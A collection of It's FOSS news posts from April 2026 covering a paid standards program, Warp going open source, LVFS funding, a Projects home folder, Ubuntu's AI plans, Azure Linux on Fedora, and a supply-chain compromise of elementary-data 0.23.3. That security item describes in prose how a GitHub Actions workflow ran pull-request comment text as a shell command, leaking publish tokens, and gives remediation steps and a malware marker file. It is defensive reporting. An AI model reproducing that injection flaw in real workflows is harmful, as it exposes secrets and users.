Rabu, 29 April 2026

Sovereign Tech Agency Opens Paid Standards Program for Open Source Maintainers

The Sovereign Tech Agency has launched a new pilot program called Sovereign Tech Standards, and it will be paying open source maintainers to get involved in the processes that actually shape how the internet works.

As a pilot program, it is going to support maintainers to actively participate in standards development at the Internet Engineering Task Force (IETF), the World Wide Web Consortium (W3C), and the International Organization for Standardization (ISO).

The problem they are trying to tackle here is of access. Participation in bodies like IETF, W3C, and ISO is relatively open, but the reality is different. Attending meetings, keeping up with working group discussions, and contributing meaningfully takes a lot of investment, both in terms of time and money.

a wide picture that shows a cropped screenshot of the sovereign tech standards webpage with some user interface elements visible

Large tech companies are said to be sending people to these meetings as a routine business investment, but most independent open source maintainers simply do not have the time, resources, or sustained capacity to do the same.

Why is this an issue? Maintainers are the people who actually build software on top of these standards, and they know better than anyone where the specs fall apart in practice.

So, wouldn't it be reasonable to directly involve such talent with the standards themselves?

Sovereign Tech Agency ran a survey among maintainers who had worked with such standards and found that many of them relied on the specifications in their day-to-day work. Yet very few could afford to take part in their development in the long term.

During 2026's pilot run, up to ten maintainers will be selected for a cohort running from mid-June 2026 through June 2027. They will need to put in around ten hours a week on standards work at IETF, W3C, or ISO.

Every one of the selected developers will get a monthly stipend between €4,800 and €5,200, with things like SDO participation fees, travel to in-person meetings, and onboarding covered.

How to apply?

To be eligible, you need to be an active maintainer of an open source project whose work is related to standards at IETF, W3C, or ISO in some way. Prior experience with standards bodies is not required, and there are no geographic restrictions either.

The selection panel scores applications on how foundational the relevant standard is, what you are planning to work on, whether your perspective is missing from that working group, and your background as a maintainer.

You should go for it if you meet those requirements.

Applications are open now and close on May 19, 2026, at 11:59 PM CEST. Review and selection will happen during May 2026, with the applicants being notified in June 2026.

The program itself is set to kick off at the end of June 2026. You can also find some additional information on the program's official page.



from It's FOSS https://ift.tt/rmYOApF
via IFTTT

Good News! AI-first Warp Terminal is Now Open Source

Warp has open-sourced its terminal client. The code is now on GitHub, and the company wants the community involved in building it out going forward, but the contribution model looks nothing like you would expect from an open source project.

They say that the main bottleneck in development right now is no longer writing code but the human-led tasks such as deciding on features and verifying the behavior of a piece of software.

They are looking towards agents to handle the implementation, while human contributors focus on ideas, spec work, and review. The developers are now confident enough that Oz-generated code, guided by their own rules and verification processes, puts contributors in a good position to get features right.

If you didn't know, Oz is Warp's cloud agent orchestration platform, announced earlier this year, which lets you run multiple coding agents in parallel in the cloud with full visibility and control over what they're doing.

Announcing this move, Zach Lloyd, the CEO of Warp, added that:

Open-sourcing is fundamentally coming from our desire to build a successful business. We are competing with other highly funded, closed-source competitors, and we think opening and providing the resources for the community to improve Warp is a smart way for us to accelerate product development.
📋
Now compare the above with what Cal.com recently did.

As a refresher, Warp (partner link) is a modern terminal and agentic development environment built in Rust. It runs on Linux, Windows, and macOS, with a block-based command interface and built-in support for AI coding agents like Claude Code, Codex, and Gemini CLI.

Get the sauce

a cropped screenshot of the readme section of warp's github repository that shows a colorful banner and some text

The client codebase is now live at github.com/warpdotdev/warp, and the licensing is split depending on the component. The UI framework, consisting of warpui_core and warpui crates, is under the MIT license, while the rest of the codebase is under AGPLv3.

OpenAI is the founding sponsor of the repository, and the agentic contribution workflows are powered by GPT models. Keep in mind that other coding agents are welcome too, but Warp would rather you use Oz, which already has the right context and checks baked in for this workflow.

Warp is also expanding open source model support with this announcement, bringing in Kimi, MiniMax, and Qwen, plus a new "auto (open)" routing option that selects the best open model for a given task. A settings file for programmatic control and easier portability across devices is shipping too.


Suggested Read 📖: Ubuntu is Betting on AI



from It's FOSS https://ift.tt/qEdKHGw
via IFTTT

Selasa, 28 April 2026

LVFS Has Turned Up the Heat on Vendors Who Won't Contribute

The Linux Vendor Firmware Service, or LVFS, is what makes firmware updates on Linux not a nightmare. Hardware vendors upload their firmware directly to it, and users get those updates delivered through fwupd and tools like GNOME Software.

According to official estimates, the project has shipped over 140 million updates from 150 vendors and is a requirement for most consumer-facing Original Equipment Manufacturers (OEMs), Original Design Manufacturers (ODMs), and Independent BIOS Vendors (IBVs).

But the project is moving towards a dilemma that most open source projects of its scale eventually face. To be a sustainable undertaking in the long term. 🗓📈

They need support

this is an image of the lvfs dashboard with demo uploaded firmware data visible
Just a placeholder image of the LVFS dashboard.

Right now, the Linux Foundation covers all of LVFS' hosting costs, and Red Hat funds Richard Hughes, the project's only full-time developer. Richard, along with a bunch of part-time contributors, keep over 20,000 firmware files in circulation.

Their sustainability plan flags some key issues that come with being this understaffed.

The project has no dedicated security response team, its sole maintainer has no backup, and the volume of critical work keeps growing with no one new stepping in to help.

Security vulnerabilities get handled on a best-effort basis (yikes ☠️), and very few companies are supporting fwupd core or the LVFS web service. You could call it a tragedy of the commons where everyone depends on it, but almost no one is paying for it.

The plan was published in August 2025, and LVFS has been rolling out restrictions in phases since then. April 2025 already brought in fair-use download utilization graphs to vendor pages. Fair use upload tracking came in July, and sponsorship tiers opened up in August 2025.

The April 2026 phase kicked in at the start of this month and has been live for nearly four weeks now. Any firmware page where a vendor is crossing 50,000 monthly downloads now shows an overquota warning.

a tiny screenshot that showcases lvfs' new overquota warning
Courtesy of Richard Hughes.

Vendors below the "Startup" sponsorship level have also lost access to detailed per-firmware analytics. In August, custom LVFS API access will be cut for non-Startup vendors, with automated upload limits following in December.

How can you help?

a table that shows the premier, startup, and associate sponsorship tiers for the lvfs project

LVFS is looking for vendors who use its infrastructure to pitch in. Presently, only two hold Startup sponsor status: Framework Computer and the Open Source Firmware Foundation.

What they actually need is either two full-time software engineers or $400,000 to fund the hires through the Linux Foundation, plus a separate $30,000 for hosting. The sponsorship tiers are as follows:

  • Premier: $100,000 per year
  • Startup: $10,000 per year (under 99 employees)
  • Associate: Free, but only available to registered non-profits, academic institutions, and government entities.

Both Premier and Startup tiers require an LF Silver Membership (page 28) on top of the listed fees. There is no free option for commercial hardware vendors. Alternatively, vendors can contribute a full-time engineer to work on LVFS or fwupd directly.


Suggested Read 📖: Will You Pay $119 For An Open Source KVM?



from It's FOSS https://ift.tt/CJPv5Zq
via IFTTT

Hackers Hijacked a GitHub Actions Workflow to Push Malicious Code to PyPI

We have been routinely seeing open source projects getting hit by malicious actors with varying degrees of sophistication. Developers are often left scrambling to push out fixes in such situations.

As to why they get targeted, their attack surface is wide, maintainer bandwidth is limited, and one bad package can quietly reach thousands of users before anyone even notices.

When something slips through, developers have to yank releases, rotate credentials, and piece together what got out.

We now have a similar situation where Elementary Data's OSS Python CLI was compromised. And if you had the affected version installed, then you have some cleanup to do.

How it happened

The attack came down to a flaw in one of Elementary's GitHub Actions workflows. It was set up in a way where text from a PR comment could be passed directly into a shell command, so whatever the comment said, the runner would execute it.

At 22:10 UTC on April 24, the attacker posted a malicious comment on a pull request. The workflow ran it as code, handing over access to the runner's secrets, including the PyPI publish token and the GITHUB_TOKEN.

With those in hand, they created the branches and pull requests needed to stage a release, then kicked off Elementary's release workflow. By 22:20 UTC, elementary-data 0.23.3 was live on PyPI. A malicious Docker image was pushed four minutes later.

Who got hit

Only users who installed elementary-data 0.23.3 (now removed) from PyPI are affected, as well as anyone who pulled the compromised Docker image during the attack window.

However, Elementary Cloud is unaffected, the Elementary dbt package is unaffected, and every other version of the CLI is unaffected. That said, if you were running 0.23.3, the exposure is serious. The malware had access to anything the environment could reach.

The remedy

First check your installed version first:

pip show elementary-data | grep Version

If it shows 0.23.3, get rid of it and install the clean version:

pip uninstall elementary-data
pip install elementary-data==0.23.4

Update your requirements files and lockfiles to reflect that too.

You should also check for a marker file the malware leaves behind. If it's there, the payload ran on that machine:

  • Linux/macOS: /tmp/.trinny-security-update
  • Windows: %TEMP%\.trinny-security-update

If you find it, rotate every credential that environment had access to, and get your security team looking for any suspicious activity on those credentials.

On their end, Elementary has already pulled 0.23.3 from PyPI, GitHub, and the Docker registry on April 25.

They also decommissioned the compromised workflow, audited the rest of their GitHub Actions for the same type of vulnerability, regenerated all affected secrets, and moved to OIDC authentication.

They are currently working with an Israeli cybersecurity firm to conduct an investigation and step up their protection against such attacks going forward.



from It's FOSS https://ift.tt/v4Vzh7U
via IFTTT

Linux is Getting a New Default Folder in Your Home Directory

If you are using a rolling release distro like Arch, you might have noticed that your home directory now has a new member, a new folder called "Projects".

For as long as I remember, Linux has always had a set of default folders under the home directory. Usually they are Documents, Music, Pictures, Videos and Downloads. Templates, Desktop and Public folders are also there.

Now we have a new addition in the form of "Projects".

Projects directory for your ...well...projects

New Projects directory in Linux

The purpose of the Projects directory is simple. It gives you a place to keep your project files, the kind of files that do not necessarily go in Documents, Music, Pictures and Videos. For example, your coding projects, your 3D printing and CAD projects etc.

Why it is more than 'just another directory'

The addition of a standard Projects directory is not just about keeping your home folder organized. It has bigger implications.

For starters, it gives applications a predictable place to store project-related files. Just like image-related apps often default to the Pictures folder and video tools save into Videos, development tools, CAD software, hardware design suites applications could use Projects as their natural default.

This can also improve interoperability between tools. An IDE could offer to create repositories in Projects by default. Build tools could assume a sensible project workspace, and installation guides or README instructions could refer to a common location instead of telling users to create arbitrary folders like ~/dev, ~/code, or ~/projects.

Sandboxed applications such as Flatpak apps may also benefit because a standardized location is easier to recognize and grant permissions for.

Not to forget, backup tools, synchronization services could treat the Projects directory as a meaningful category of data, same as Documents or Pictures.

In other words, this is not 'just another directory'. It provides better desktop workflows. A small standardization like this may quietly improve usability across the Linux desktop over time.

This was an 11-year-old "request"

And interestingly, this isn’t a brand new idea. The concept has existed for over a decade.

Actually, the request to include a standard Projects directory was created in 2014. The reasoning from the original request still holds up today:

Currently XDG user dirs does not specify a directory for environments of projects. For software projects these usually include source code, version control, compiled binaries, test artefacts and downloaded dependencies. As they are much more than downloads and usually kept indefinitely, they do not fit in there. The benefit of defining a projects folder would be that when writing a README or install script for a project, one could automatically download the source to the user defined location, set up the build environment and install from there.

Like several instances in the recent past, GNOME/Freedesktop/KDE are paying attention to decades-old requests and implementing some of them.

💡
Don't like the new Projects directory? Just delete it. The xdg-user-dirs utility will not try to create it again. The default location for this directory will be moved to your home directory.

Power users, who want more control, can edit the ~/.config/user-dirs.dirs configuration file and modify it to control what goes where.

The road ahead for this change

This new standard directory change came with the release of xdg-user-dirs version 0.20. As I mentioned earlier, people using rolling release distros might already have this change. You can see a screenshot of EndeavorOS:

New projects directory in terminal

As GNOME contributor Matthias notes, support for GLib will be added in the coming months so that Flatpak, desktops and applications can make use of the Projects directory.

I am looking forward to it. You?

I have always created a dev directory in my home directory. This is where my coding related project files are located. It's better than keeping them under Documents because technically, these are not documents.

I think that I am not the only one who does this. I guess most of us have a projects or dev directory under Home.

Including a standard Projects directory is a good move. Not only does it remove the guesswork about where to keep such files, various applications can also take advantage of this new directory.

It may look like a small addition, but standardizing something many Linux users already do can improve workflows, application behavior, and even documentation over time. For a simple extra folder, “Projects” could have surprisingly large impact.



from It's FOSS https://ift.tt/RkDj37J
via IFTTT

Ubuntu is Going Big on AI (But Not The Copilot Kind You Dread)

AI has been creeping into everything, and the Linux ecosystem is no exception. Over the last couple of years, local AI has gone from a niche curiosity to something people can actually run on their machines.

On the user side, tools like Ollama and LM Studio have made it surprisingly straightforward to pull open-weight models and run them locally without requiring a cloud subscription.

For enterprises, solutions like RHEL AI and SUSE Linux Enterprise Server have been catering to organizations that want AI woven into their infrastructure.

Now, it looks like Canonical is jumping onto the bandwagon, as Ubuntu moves towards AI, and before you start calling it Ubuslop or something along those lines, understand how they are going about this.

What's happening?

cropped screenshot that shows a discourse forum post by a jnsgruk (jon seager) laying out the ubuntu ai roadmap

Jon Seager, VP of Engineering at Canonical, has published a post on Ubuntu Discourse laying out the company's AI roadmap. The short version is that AI is coming to Ubuntu; it will be local-first, and it will be built around open-weight models and open source tooling.

He laid out a framework distinguishing between two kinds of AI features, implicit and explicit. Implicit AI is about making existing OS features smarter in the background without requiring users to learn anything new or interact with anything that looks like AI.

He gave the examples of speech-to-text and text-to-speech, both of which can be improved using local inference with open source inference tools and open weight models, running entirely on-device.

Explicit AI features are a different story. These are the more obviously AI-centric, agentic workflows that could automate troubleshooting, create documents or applications, and run scheduled maintenance on a fleet of machines.

Jon also gave everyone a look at what it could look like in practice:

Imagine being able to ask your Linux machine to troubleshoot a Wi-Fi connection issue, or to stand up an open source software forge that’s pre-configured, secured, and reachable over TLS.
One could easily imagine using such a capability as a gateway for controlling your Linux machine from other devices through a variety of mediums - be that a mobile app, text messaging, voice commands or otherwise.

The delivery mechanism for all of this is inference snaps. Rather than asking users to wrangle separate tools, sift through Hugging Face, and figure out which model format works on their hardware, Canonical wants a simple snap install to handle everything, with hardware-optimized builds served based on your silicon.

And since snaps carry the same confinement rules as everything else in the ecosystem, the models are sandboxed and cannot freely reach into your files or data.

Makes sense, I guess?

The local inference approach is what makes this worth paying attention to. The default is not a cloud call to some API that logs your prompts and charges you per token. It runs on your hardware, stays there, and does not require signing up for anything.

Of course, cloud and external services are still an option, but only as a fallback for people who specifically need them, not the assumed path. That is a bigger deal than it sounds, btw.

Most AI integration announcements from Big Tech players start from the opposite assumption—cloud first, local maybe someday.

Should you be worried?

When Linux and AI are mentioned in the same breath, your mind might naturally draw a comparison to Microsoft's infamous Copilot offering, where the default experience is cloud, the model is proprietary, and half the features quietly require a Microsoft account.

What Jon is proposing keeps the user-facing, agentic stuff strictly opt-in. The implicit features would run quietly in the background and improve things you already use. Nobody is bolting a chatbot sidebar into GNOME and calling it a "productivity feature."

But, as things go with roadmaps, decisions shift under pressure and user expectations change over time. I suggest keeping a close watch on how things develop for the rest of the year.



from It's FOSS https://ift.tt/D7ZWkeo
via IFTTT

Microsoft Might Be Rebasing Azure on Fedora Linux

Microsoft's in-house Linux distribution, Azure Linux, may be heading for a significant overhaul. According to a recent report, the Big Tech giant is reportedly exploring the idea of rebasing Azure Linux on Fedora, which would be a notable shift in how the distribution is built and maintained.

Azure Linux, which longtime followers of the Linux space may know better as CBL-Mariner, has been Microsoft's internal Linux OS powering Azure services, WSL, Azure Local, and more since 2020.

It is already RPM-based, so a move toward Fedora would not be a complete departure from its existing foundation, but it would represent a serious overhaul.

a cropped screenshot of the fedora eln sig meeting on april 21 that shows conversation between neal gompa and yaakov selkowitz
The conversation between Neal Gompa (conan_kudo) and Yaakov Selkowitz (yselkowitz).

It all came to light from the recent Fedora ELN SIG meeting on April 21. During a discussion about a proposed Fedora change to build x86-64-v3 packages for Fedora 45, it was pointed out that Microsoft is one of the driving forces behind this proposal.

The change proposal was put forward jointly by Kyle Gospodnetich, a Linux engineer at Microsoft, alongside Lleyton Gray and Owen Zimmerman of Fyra Labs. Microsoft's interest appears to be tied to Azure Linux's need for x86-64-v3 performance gains, which is part of what is driving the rebase idea.

Fyra Labs, which is reportedly launching its own cloud service and wants x86-64-v3 support for Fedora and Ultramarine Linux, is also co-authoring the proposal.

It is worth noting that the x86-64-v3 change proposal still needs to be approved by the Fedora Engineering Steering Committee (FESCo) before anything moves forward.

There had also been talk of forking the whole distribution to achieve this, but Microsoft was steered toward working within the Fedora ecosystem instead.

On the surface, all of this sounds promising. As a Redditor pointed out, since Fedora is effectively upstream Red Hat Enterprise Linux, the move makes logical sense on paper.

That said, Microsoft has a history of open source commitments that lose steam over time. If they can properly follow through here, contribute meaningfully to Fedora, and not treat it as a one-way resource tap, this could genuinely be good for the ecosystem.

All of that is a big if, but it is worth watching closely.


Suggested Read 📖: Ubuntu 26.04 LTS is Here



from It's FOSS https://ift.tt/XEF6gSb
via IFTTT